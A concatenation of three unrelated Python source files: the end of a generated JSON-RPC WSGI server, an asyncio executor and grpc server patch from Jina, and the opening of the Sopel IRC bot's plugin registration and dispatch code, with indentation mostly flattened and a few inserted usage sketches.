# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP service,
# listening on port 9999 by default, execute this file directly.
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
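# Editor's note -- illustrative usage sketch, not part of the generated server code:
# per the docstring above, running the WSGI app in a separate process lets the caller
# obtain the system-assigned port and later shut the server down via stop_server().
def _run_server_briefly_example():
    port = start_server(host='localhost', port=0, newprocess=True)  # 0 = pick a free port
    try:
        return port
    finally:
        stop_server()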
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
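# Editor's note -- illustrative sketch, not part of the generated server code:
# process_async_cli expects the input file to hold a JSON-RPC style request. The
# payload below targets the 'kb_cobrapy.status' method registered above; the exact
# params shape is an assumption and only meant as a hypothetical example.
def _write_example_async_request(path='input.json'):
    request = {'method': 'kb_cobrapy.status', 'params': [{}],
               'version': '1.1', 'id': '42'}
    with open(path, 'w') as f:
        json.dump(request, f)
    return path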
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
grpc_asyncio.py
|
__copyright__ = "Copyright (c) 2020 Jina AI Limited. All rights reserved."
__license__ = "Apache-2.0"
import asyncio
import functools
import inspect
import threading
from concurrent import futures
from grpc import _server
def _loop_mgr(loop: asyncio.AbstractEventLoop):
asyncio.set_event_loop(loop)
if not loop.is_running():
loop.run_forever()
# If we reach here, the loop was stopped.
# We should gather any remaining tasks and finish them.
pending = asyncio.all_tasks(loop)
if pending:
loop.run_until_complete(asyncio.gather(*pending))
if not loop.is_running():
loop.close()
class AsyncioExecutor(futures.Executor):
def __init__(self, *, loop=None):
super().__init__()
self._shutdown = False
try:
self._loop = loop or asyncio.get_event_loop()
except RuntimeError:
self._loop = asyncio.new_event_loop()
self._thread = threading.Thread(target=_loop_mgr, args=(self._loop,),
daemon=True)
self._thread.start()
def submit(self, fn, *args, **kwargs):
if self._shutdown:
raise RuntimeError('Cannot schedule new futures after shutdown')
if not self._loop.is_running():
raise RuntimeError('Loop must be started before any function can be submitted')
if inspect.iscoroutinefunction(fn):
coro = fn(*args, **kwargs)
return asyncio.run_coroutine_threadsafe(coro, self._loop)
else:
func = functools.partial(fn, *args, **kwargs)
return self._loop.run_in_executor(None, func)
    def shutdown(self, wait=True):
        # Stop the loop from its own thread; calling close() on a running loop
        # would raise RuntimeError. _loop_mgr performs the final cleanup
        # (draining pending tasks and closing the loop) once run_forever returns.
        if self._loop.is_running():
            self._loop.call_soon_threadsafe(self._loop.stop)
        self._shutdown = True
        if wait:
            self._thread.join()
        else:
            self._thread.join(0)
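# Editor's note -- illustrative usage sketch, not part of the original module: the
# executor accepts both coroutine functions and plain callables; coroutines are
# scheduled on the background loop via run_coroutine_threadsafe, everything else
# goes through run_in_executor. Plugging it into grpc.server(...) as the thread pool
# is presumably the intent, given the _server monkey-patching below, but that wiring
# is an assumption here. The function name below is hypothetical.
def _asyncio_executor_example():
    async def _async_job():
        await asyncio.sleep(0.01)
        return 'done (async)'
    import time
    executor = AsyncioExecutor()
    while not executor._loop.is_running():  # give the background loop a moment to start
        time.sleep(0.01)
    future = executor.submit(_async_job)        # concurrent.futures.Future
    result = future.result(timeout=1)           # -> 'done (async)'
    sync_future = executor.submit(len, 'abcd')  # plain callable -> run_in_executor path
    return result, sync_future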
async def _call_behavior(rpc_event, state, behavior, argument, request_deserializer):
context = _server._Context(rpc_event, state, request_deserializer)
try:
return await behavior(argument, context), True
except Exception as e: # pylint: disable=broad-except
with state.condition:
if e not in state.rpc_errors:
details = f'Exception calling application: {e}'
_server.logging.exception(details)
_server._abort(state, rpc_event.operation_call,
_server.cygrpc.StatusCode.unknown, _server._common.encode(details))
return None, False
async def _take_response_from_response_iterator(rpc_event, state, response_iterator):
try:
return await response_iterator.__anext__(), True
except StopAsyncIteration:
return None, True
except Exception as e: # pylint: disable=broad-except
with state.condition:
if e not in state.rpc_errors:
details = f'Exception iterating responses: {e}'
_server.logging.exception(details)
_server._abort(state, rpc_event.operation_call,
_server.cygrpc.StatusCode.unknown, _server._common.encode(details))
return None, False
async def _unary_response_in_pool(rpc_event, state, behavior, argument_thunk,
request_deserializer, response_serializer):
argument = argument_thunk()
if argument is not None:
response, proceed = await _call_behavior(rpc_event, state, behavior,
argument, request_deserializer)
if proceed:
serialized_response = _server._serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
_server._status(rpc_event, state, serialized_response)
async def _stream_response_in_pool(rpc_event, state, behavior, argument_thunk,
request_deserializer, response_serializer):
argument = argument_thunk()
if argument is not None:
# Notice this calls the normal `_call_behavior` not the awaitable version.
response_iterator, proceed = _server._call_behavior(
rpc_event, state, behavior, argument, request_deserializer)
if proceed:
while True:
response, proceed = await _take_response_from_response_iterator(
rpc_event, state, response_iterator)
if proceed:
if response is None:
_server._status(rpc_event, state, None)
break
else:
serialized_response = _server._serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
proceed = _server._send_response(rpc_event, state,
serialized_response)
if not proceed:
break
else:
break
else:
break
_server._unary_response_in_pool = _unary_response_in_pool
_server._stream_response_in_pool = _stream_response_in_pool
|
bot.py
|
# coding=utf-8
# Copyright 2008, Sean B. Palmer, inamidst.com
# Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
# Copyright 2012-2015, Elsie Powell, http://embolalia.com
# Copyright 2019, Florian Strzelecki <florian.strzelecki@gmail.com>
#
# Licensed under the Eiffel Forum License 2.
from __future__ import unicode_literals, absolute_import, print_function, division
from ast import literal_eval
import collections
from datetime import datetime
import itertools
import logging
import re
import sys
import threading
import time
from sopel import irc, logger, plugins, tools
from sopel.db import SopelDB
from sopel.tools import Identifier, deprecated
import sopel.tools.jobs
from sopel.trigger import Trigger
from sopel.module import NOLIMIT
import sopel.loader
__all__ = ['Sopel', 'SopelWrapper']
LOGGER = logging.getLogger(__name__)
if sys.version_info.major >= 3:
unicode = str
basestring = str
py3 = True
else:
py3 = False
class Sopel(irc.AbstractBot):
def __init__(self, config, daemon=False):
super(Sopel, self).__init__(config)
self._daemon = daemon # Used for iPython. TODO something saner here
self.wantsrestart = False
self._running_triggers = []
self._running_triggers_lock = threading.Lock()
# `re.compile('.*') is re.compile('.*')` because of caching, so we need
# to associate a list with each regex, since they are unexpectedly
# indistinct.
self._callables = {
'high': collections.defaultdict(list),
'medium': collections.defaultdict(list),
'low': collections.defaultdict(list)
}
self._plugins = {}
self.doc = {}
"""A dictionary of command names to their documentation.
Each command is mapped to its docstring and any available examples, if
declared in the plugin's code.
.. versionchanged:: 3.2
Use the first item in each callable's commands list as the key,
instead of the function name as declared in the source code.
"""
self._command_groups = collections.defaultdict(list)
"""A mapping of plugin names to lists of their commands."""
self._times = {}
"""
A dictionary mapping lowercased nicks to dictionaries which map
function names to the time which they were last used by that nick.
"""
self.server_capabilities = {}
"""A dict mapping supported IRCv3 capabilities to their options.
For example, if the server specifies the capability ``sasl=EXTERNAL``,
it will be here as ``{"sasl": "EXTERNAL"}``. Capabilities specified
without any options will have ``None`` as the value.
        For servers that do not support IRCv3, this will be empty.
"""
self.privileges = dict()
"""A dictionary of channels to their users and privilege levels.
The value associated with each channel is a dictionary of
:class:`sopel.tools.Identifier`\\s to a bitwise integer value,
determined by combining the appropriate constants from
:mod:`sopel.module`.
.. deprecated:: 6.2.0
Use :attr:`channels` instead. Will be removed in Sopel 8.
"""
self.channels = tools.SopelMemory() # name to chan obj
"""A map of the channels that Sopel is in.
The keys are :class:`sopel.tools.Identifier`\\s of the channel names,
and map to :class:`sopel.tools.target.Channel` objects which contain
the users in the channel and their permissions.
"""
self.users = tools.SopelMemory() # name to user obj
"""A map of the users that Sopel is aware of.
The keys are :class:`sopel.tools.Identifier`\\s of the nicknames, and
map to :class:`sopel.tools.target.User` instances. In order for Sopel
to be aware of a user, it must share at least one mutual channel.
"""
self.db = SopelDB(config)
"""The bot's database, as a :class:`sopel.db.SopelDB` instance."""
self.memory = tools.SopelMemory()
"""
A thread-safe dict for storage of runtime data to be shared between
plugins. See :class:`sopel.tools.SopelMemory`.
"""
self.shutdown_methods = []
"""List of methods to call on shutdown."""
self.scheduler = sopel.tools.jobs.JobScheduler(self)
"""Job Scheduler. See :func:`sopel.module.interval`."""
@property
def command_groups(self):
"""A mapping of plugin names to lists of their commands."""
# This was supposed to be deprecated, but the built-in help plugin needs it
return self._command_groups
@property
def hostmask(self):
"""The current hostmask for the bot :class:`sopel.tools.target.User`.
:return: the bot's current hostmask
:rtype: str
Bot must be connected and in at least one channel.
"""
if not self.users or self.nick not in self.users:
raise KeyError("'hostmask' not available: bot must be connected and in at least one channel.")
return self.users.get(self.nick).hostmask
def setup(self):
"""Set up Sopel bot before it can run.
The setup phase is in charge of:
* setting up logging (configure Python's built-in :mod:`logging`)
* setting up the bot's plugins (load, setup, and register)
* starting the job scheduler
"""
self.setup_logging()
self.setup_plugins()
self.scheduler.start()
def setup_logging(self):
"""Set up logging based on config options."""
logger.setup_logging(self.settings)
base_level = self.settings.core.logging_level or 'INFO'
base_format = self.settings.core.logging_format
base_datefmt = self.settings.core.logging_datefmt
# configure channel logging if required by configuration
if self.settings.core.logging_channel:
channel_level = self.settings.core.logging_channel_level or base_level
channel_format = self.settings.core.logging_channel_format or base_format
channel_datefmt = self.settings.core.logging_channel_datefmt or base_datefmt
channel_params = {}
if channel_format:
channel_params['fmt'] = channel_format
if channel_datefmt:
channel_params['datefmt'] = channel_datefmt
formatter = logger.ChannelOutputFormatter(**channel_params)
handler = logger.IrcLoggingHandler(self, channel_level)
handler.setFormatter(formatter)
# set channel handler to `sopel` logger
LOGGER = logging.getLogger('sopel')
LOGGER.addHandler(handler)
def setup_plugins(self):
"""Load plugins into the bot."""
load_success = 0
load_error = 0
load_disabled = 0
LOGGER.info('Loading plugins...')
usable_plugins = plugins.get_usable_plugins(self.settings)
for name, info in usable_plugins.items():
plugin, is_enabled = info
if not is_enabled:
load_disabled = load_disabled + 1
continue
try:
plugin.load()
except Exception as e:
load_error = load_error + 1
LOGGER.exception('Error loading %s: %s', name, e)
else:
try:
if plugin.has_setup():
plugin.setup(self)
plugin.register(self)
except Exception as e:
load_error = load_error + 1
LOGGER.exception('Error in %s setup: %s', name, e)
else:
load_success = load_success + 1
LOGGER.info('Plugin loaded: %s', name)
total = sum([load_success, load_error, load_disabled])
if total and load_success:
LOGGER.info(
'Registered %d plugins, %d failed, %d disabled',
(load_success - 1),
load_error,
load_disabled)
else:
LOGGER.warning("Warning: Couldn't load any plugins")
def reload_plugin(self, name):
"""Reload a plugin.
:param str name: name of the plugin to reload
:raise plugins.exceptions.PluginNotRegistered: when there is no
``name`` plugin registered
This function runs the plugin's shutdown routine and unregisters the
plugin from the bot. Then this function reloads the plugin, runs its
setup routines, and registers it again.
"""
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
plugin = self._plugins[name]
# tear down
plugin.shutdown(self)
plugin.unregister(self)
LOGGER.info('Unloaded plugin %s', name)
# reload & setup
plugin.reload()
plugin.setup(self)
plugin.register(self)
meta = plugin.get_meta_description()
LOGGER.info('Reloaded %s plugin %s from %s',
meta['type'], name, meta['source'])
def reload_plugins(self):
"""Reload all registered plugins.
First, this function runs all plugin shutdown routines and unregisters
all plugins. Then it reloads all plugins, runs their setup routines, and
registers them again.
"""
registered = list(self._plugins.items())
# tear down all plugins
for name, plugin in registered:
plugin.shutdown(self)
plugin.unregister(self)
LOGGER.info('Unloaded plugin %s', name)
# reload & setup all plugins
for name, plugin in registered:
plugin.reload()
plugin.setup(self)
plugin.register(self)
meta = plugin.get_meta_description()
LOGGER.info('Reloaded %s plugin %s from %s',
meta['type'], name, meta['source'])
def add_plugin(self, plugin, callables, jobs, shutdowns, urls):
"""Add a loaded plugin to the bot's registry.
:param plugin: loaded plugin to add
:type plugin: :class:`sopel.plugins.handlers.AbstractPluginHandler`
:param callables: an iterable of callables from the ``plugin``
:type callables: :term:`iterable`
:param jobs: an iterable of functions from the ``plugin`` that are
periodically invoked
:type jobs: :term:`iterable`
:param shutdowns: an iterable of functions from the ``plugin`` that
should be called on shutdown
:type shutdowns: :term:`iterable`
:param urls: an iterable of functions from the ``plugin`` to call when
matched against a URL
:type urls: :term:`iterable`
"""
self._plugins[plugin.name] = plugin
self.register(callables, jobs, shutdowns, urls)
def remove_plugin(self, plugin, callables, jobs, shutdowns, urls):
"""Remove a loaded plugin from the bot's registry.
:param plugin: loaded plugin to remove
:type plugin: :class:`sopel.plugins.handlers.AbstractPluginHandler`
:param callables: an iterable of callables from the ``plugin``
:type callables: :term:`iterable`
:param jobs: an iterable of functions from the ``plugin`` that are
periodically invoked
:type jobs: :term:`iterable`
:param shutdowns: an iterable of functions from the ``plugin`` that
should be called on shutdown
:type shutdowns: :term:`iterable`
:param urls: an iterable of functions from the ``plugin`` to call when
matched against a URL
:type urls: :term:`iterable`
"""
name = plugin.name
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
# remove commands, jobs, and shutdown functions
for func in itertools.chain(callables, jobs, shutdowns):
self.unregister(func)
# remove URL callback handlers
if "url_callbacks" in self.memory:
for func in urls:
regexes = func.url_regex
for regex in regexes:
if func == self.memory['url_callbacks'].get(regex):
self.unregister_url_callback(regex, func)
LOGGER.debug('URL Callback unregistered: %r', regex)
# remove plugin from registry
del self._plugins[name]
def has_plugin(self, name):
"""Check if the bot has registered a plugin of the specified name.
:param str name: name of the plugin to check for
:return: whether the bot has a plugin named ``name`` registered
:rtype: bool
"""
return name in self._plugins
def get_plugin_meta(self, name):
"""Get info about a registered plugin by its name.
:param str name: name of the plugin about which to get info
:return: the plugin's metadata
(see :meth:`~.plugins.handlers.AbstractPluginHandler.get_meta_description`)
:rtype: :class:`dict`
:raise plugins.exceptions.PluginNotRegistered: when there is no
``name`` plugin registered
"""
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
return self._plugins[name].get_meta_description()
def unregister(self, obj):
"""Unregister a callable.
:param obj: the callable to unregister
:type obj: :term:`object`
"""
if not callable(obj):
LOGGER.warning('Cannot unregister obj %r: not a callable', obj)
return
callable_name = getattr(obj, "__name__", 'UNKNOWN')
if hasattr(obj, 'rule'): # commands and intents have it added
for rule in obj.rule:
callb_list = self._callables[obj.priority][rule]
if obj in callb_list:
callb_list.remove(obj)
LOGGER.debug(
'Rule callable "%s" unregistered for "%s"',
callable_name,
rule.pattern)
if hasattr(obj, 'interval'):
self.scheduler.remove_callable_job(obj)
LOGGER.debug('Job callable removed: %s', callable_name)
if callable_name == "shutdown" and obj in self.shutdown_methods:
self.shutdown_methods.remove(obj)
def register(self, callables, jobs, shutdowns, urls):
"""Register rules, jobs, shutdown methods, and URL callbacks.
:param callables: an iterable of callables to register
:type callables: :term:`iterable`
:param jobs: an iterable of functions to periodically invoke
:type jobs: :term:`iterable`
:param shutdowns: an iterable of functions to call on shutdown
:type shutdowns: :term:`iterable`
:param urls: an iterable of functions to call when matched against a URL
:type urls: :term:`iterable`
The ``callables`` argument contains a list of "callable objects", i.e.
objects for which :func:`callable` will return ``True``. They can be:
* a callable with rules (will match triggers with a regex pattern)
* a callable without rules (will match any triggers, such as events)
* a callable with commands
* a callable with nick commands
* a callable with action commands
It is possible to have a callable with rules, commands, and nick
commands configured. It should not be possible to have a callable with
commands or nick commands but without rules.
"""
# Append plugin's shutdown function to the bot's list of functions to
# call on shutdown
self.shutdown_methods += shutdowns
match_any = re.compile('.*')
for callbl in callables:
callable_name = getattr(callbl, "__name__", 'UNKNOWN')
rules = getattr(callbl, 'rule', [])
commands = getattr(callbl, 'commands', [])
nick_commands = getattr(callbl, 'nickname_commands', [])
action_commands = getattr(callbl, 'action_commands', [])
events = getattr(callbl, 'event', [])
is_rule_only = rules and not commands and not nick_commands
if rules:
for rule in rules:
self._callables[callbl.priority][rule].append(callbl)
if is_rule_only:
# Command & Nick Command are logged later:
# here we log rule only callable
LOGGER.debug(
'Rule callable "%s" registered for "%s"',
callable_name,
rule.pattern)
if commands:
LOGGER.debug(
'Command callable "%s" registered for "%s"',
callable_name,
'|'.join(commands))
if nick_commands:
LOGGER.debug(
'Nick command callable "%s" registered for "%s"',
callable_name,
'|'.join(nick_commands))
if action_commands:
LOGGER.debug(
'Action command callable "%s" registered for "%s"',
callable_name,
'|'.join(action_commands))
if events:
LOGGER.debug(
'Event callable "%s" registered for "%s"',
callable_name,
'|'.join(events))
else:
self._callables[callbl.priority][match_any].append(callbl)
if events:
LOGGER.debug(
'Event callable "%s" registered '
'with "match any" rule for "%s"',
callable_name,
'|'.join(events))
else:
LOGGER.debug(
'Rule callable "%s" registered with "match any" rule',
callable_name)
if commands:
plugin_name = callbl.__module__.rsplit('.', 1)[-1]
# TODO doc and make decorator for this. Not sure if this is how
# it should work yet, so not making it public for 6.0.
category = getattr(callbl, 'category', plugin_name)
self._command_groups[category].append(commands[0])
for command, docs in callbl._docs.items():
self.doc[command] = docs
for func in jobs:
for interval in func.interval:
job = sopel.tools.jobs.Job(interval, func)
self.scheduler.add_job(job)
callable_name = getattr(func, "__name__", 'UNKNOWN')
LOGGER.debug(
'Job added "%s", will run every %d seconds',
callable_name,
interval)
for func in urls:
for regex in func.url_regex:
self.register_url_callback(regex, func)
callable_name = getattr(func, "__name__", 'UNKNOWN')
LOGGER.debug(
'URL Callback added "%s" for URL pattern "%s"',
callable_name,
regex)
@deprecated(
reason="Replaced by `say` method.",
version='6.0',
removed_in='8.0')
def msg(self, recipient, text, max_messages=1):
"""Old way to make the bot say something on IRC.
:param str recipient: nickname or channel to which to send message
:param str text: message to send
:param int max_messages: split ``text`` into at most this many messages
if it is too long to fit in one (optional)
.. deprecated:: 6.0
Use :meth:`say` instead. Will be removed in Sopel 8.
"""
self.say(text, recipient, max_messages)
def call(self, func, sopel, trigger):
"""Call a function, applying any rate limits or other restrictions.
:param func: the function to call
:type func: :term:`function`
:param sopel: a SopelWrapper instance
:type sopel: :class:`SopelWrapper`
:param Trigger trigger: the Trigger object for the line from the server
that triggered this call
"""
nick = trigger.nick
current_time = time.time()
if nick not in self._times:
self._times[nick] = dict()
if self.nick not in self._times:
self._times[self.nick] = dict()
if not trigger.is_privmsg and trigger.sender not in self._times:
self._times[trigger.sender] = dict()
if not trigger.admin and not func.unblockable:
if func in self._times[nick]:
usertimediff = current_time - self._times[nick][func]
if func.rate > 0 and usertimediff < func.rate:
LOGGER.info(
"%s prevented from using %s in %s due to user limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, usertimediff,
func.rate
)
return
if func in self._times[self.nick]:
globaltimediff = current_time - self._times[self.nick][func]
if func.global_rate > 0 and globaltimediff < func.global_rate:
LOGGER.info(
"%s prevented from using %s in %s due to global limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, globaltimediff,
func.global_rate
)
return
if not trigger.is_privmsg and func in self._times[trigger.sender]:
chantimediff = current_time - self._times[trigger.sender][func]
if func.channel_rate > 0 and chantimediff < func.channel_rate:
LOGGER.info(
"%s prevented from using %s in %s due to channel limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, chantimediff,
func.channel_rate
)
return
# if channel has its own config section, check for excluded plugins/plugin methods
if trigger.sender in self.config:
channel_config = self.config[trigger.sender]
LOGGER.debug(
"Evaluating configuration for %s.%s in channel %s",
func.plugin_name, func.__name__, trigger.sender
)
# disable listed plugins completely on provided channel
if 'disable_plugins' in channel_config:
disabled_plugins = channel_config.disable_plugins.split(',')
# if "*" is used, we are disabling all plugins on provided channel
if '*' in disabled_plugins:
LOGGER.debug(
"All plugins disabled in %s; skipping execution of %s.%s",
trigger.sender, func.plugin_name, func.__name__
)
return
if func.plugin_name in disabled_plugins:
LOGGER.debug(
"Plugin %s is disabled in %s; skipping execution of %s",
func.plugin_name, trigger.sender, func.__name__
)
return
# disable chosen methods from plugins
if 'disable_commands' in channel_config:
disabled_commands = literal_eval(channel_config.disable_commands)
if func.plugin_name in disabled_commands:
if func.__name__ in disabled_commands[func.plugin_name]:
LOGGER.debug(
"Skipping execution of %s.%s in %s: disabled_commands matched",
func.plugin_name, func.__name__, trigger.sender
)
return
try:
exit_code = func(sopel, trigger)
except Exception as error: # TODO: Be specific
exit_code = None
self.error(trigger, exception=error)
if exit_code != NOLIMIT:
self._times[nick][func] = current_time
self._times[self.nick][func] = current_time
if not trigger.is_privmsg:
self._times[trigger.sender][func] = current_time
def get_triggered_callables(self, priority, pretrigger, blocked):
"""Get triggered callables by priority.
:param str priority: priority to retrieve callables
:param pretrigger: Sopel pretrigger object
:type pretrigger: :class:`~sopel.trigger.PreTrigger`
:param bool blocked: true if nick or channel is blocked from triggering
callables
:return: a tuple with the callable, the trigger, and if it's blocked
:rtype: :class:`tuple`
This methods retrieves all triggered callables for this ``priority``
level. It yields each function with its :class:`trigger
<sopel.trigger.Trigger>` object and a boolean flag to tell if this
callable is blocked or not.
To be triggered, a callable must match the ``pretrigger`` using a regex
pattern. Then it must comply with other criteria (if any) such as
event, intents, and echo-message filters.
A triggered callable won't actually be invoked by Sopel if the nickname
or hostname is ``blocked``, *unless* the nickname is an admin or
the callable is marked as "unblockable".
.. seealso::
Sopel invokes triggered callables in its :meth:`~.dispatch` method.
The priority of a callable can be set with the
:func:`sopel.module.priority` decorator. Other decorators from
:mod:`sopel.module` provide additional criteria and conditions.
"""
args = pretrigger.args
text = args[-1] if args else ''
event = pretrigger.event
intent = pretrigger.tags.get('intent')
nick = pretrigger.nick
is_echo_message = (
nick.lower() == self.nick.lower() and
event in ["PRIVMSG", "NOTICE"]
)
user_obj = self.users.get(nick)
account = user_obj.account if user_obj else None
# get a copy of the list of (regex, function) to prevent race-condition
# e.g. when a callable wants to remove callable (other or itself)
# from the bot, Python won't (and must not) allow to modify a dict
# while it iterates over this very same dict.
items = list(self._callables[priority].items())
for regexp, funcs in items:
match = regexp.match(text)
if not match:
continue
for func in funcs:
trigger = Trigger(
self.settings, pretrigger, match, account)
# check event
if event not in func.event:
continue
# check intents
if hasattr(func, 'intents'):
if not intent:
continue
match = any(
func_intent.match(intent)
for func_intent in func.intents
)
if not match:
continue
# check echo-message feature
if is_echo_message and not func.echo:
continue
is_unblockable = func.unblockable or trigger.admin
is_blocked = blocked and not is_unblockable
yield (func, trigger, is_blocked)
def _is_pretrigger_blocked(self, pretrigger):
if self.settings.core.nick_blocks or self.settings.core.host_blocks:
nick_blocked = self._nick_blocked(pretrigger.nick)
host_blocked = self._host_blocked(pretrigger.host)
else:
nick_blocked = host_blocked = None
return (nick_blocked, host_blocked)
def dispatch(self, pretrigger):
"""Dispatch a parsed message to any registered callables.
:param pretrigger: a parsed message from the server
:type pretrigger: :class:`~sopel.trigger.PreTrigger`
The ``pretrigger`` (a parsed message) is used to find matching callables;
it will retrieve them by order of priority, and run them. It runs
triggered callables in separate threads, unless they are marked
otherwise with the :func:`sopel.module.thread` decorator.
However, it won't run triggered callables at all when they can't be run
for blocked nickname or hostname (unless marked "unblockable" with
the :func:`sopel.module.unblockable` decorator).
.. seealso::
To get a list of triggered callables by priority, it uses
:meth:`~get_triggered_callables`. This method is also responsible
for telling ``dispatch`` if the function is blocked or not.
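        An illustrative, non-normative sketch of the decorators mentioned
        above, assuming Sopel's :mod:`sopel.module` API::
            from sopel import module
            @module.rule(r'.*')
            @module.thread(False)    # run directly in the dispatching thread
            @module.unblockable      # run even for blocked nicks/hosts
            def watcher(bot, trigger):
                pass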
"""
# list of commands running in separate threads for this dispatch
running_triggers = []
# nickname/hostname blocking
nick_blocked, host_blocked = self._is_pretrigger_blocked(pretrigger)
blocked = bool(nick_blocked or host_blocked)
list_of_blocked_functions = []
# trigger by priority
for priority in ('high', 'medium', 'low'):
items = self.get_triggered_callables(priority, pretrigger, blocked)
for func, trigger, is_blocked in items:
function_name = "%s.%s" % (func.__module__, func.__name__)
# skip running blocked functions, but track them for logging
if is_blocked:
list_of_blocked_functions.append(function_name)
continue
# call triggered function
wrapper = SopelWrapper(
self, trigger, output_prefix=func.output_prefix)
if func.thread:
# run in a separate thread
targs = (func, wrapper, trigger)
t = threading.Thread(target=self.call, args=targs)
t.name = '%s-%s' % (t.name, function_name)
t.start()
running_triggers.append(t)
else:
# direct call
self.call(func, wrapper, trigger)
# log blocked functions
if list_of_blocked_functions:
if nick_blocked and host_blocked:
block_type = 'both blocklists'
elif nick_blocked:
block_type = 'nick blocklist'
else:
block_type = 'host blocklist'
LOGGER.debug(
"%s prevented from using %s by %s.",
pretrigger.nick,
', '.join(list_of_blocked_functions),
block_type,
)
# update currently running triggers
self._update_running_triggers(running_triggers)
@property
def running_triggers(self):
"""Current active threads for triggers.
:return: the running thread(s) currently processing trigger(s)
:rtype: :term:`iterable`
This is for testing and debugging purposes only.
"""
with self._running_triggers_lock:
return [t for t in self._running_triggers if t.is_alive()]
def _update_running_triggers(self, running_triggers):
"""Update list of running triggers.
:param list running_triggers: newly started threads
We want to keep track of running triggers, mostly for testing and
debugging purposes. For instance, it'll help make sure, in tests, that
a bot plugin has finished processing a trigger, by manually joining
all running threads.
This is kept private, as it's purely internal machinery and isn't
meant to be manipulated by outside code.
"""
# update bot's global running triggers
with self._running_triggers_lock:
running_triggers = running_triggers + self._running_triggers
self._running_triggers = [
t for t in running_triggers if t.is_alive()]
def on_scheduler_error(self, scheduler, exc):
"""Called when the Job Scheduler fails.
:param scheduler: the JobScheduler that errored
:type scheduler: :class:`sopel.tools.jobs.JobScheduler`
:param Exception exc: the raised exception
.. seealso::
:meth:`Sopel.error`
"""
self.error(exception=exc)
def on_job_error(self, scheduler, job, exc):
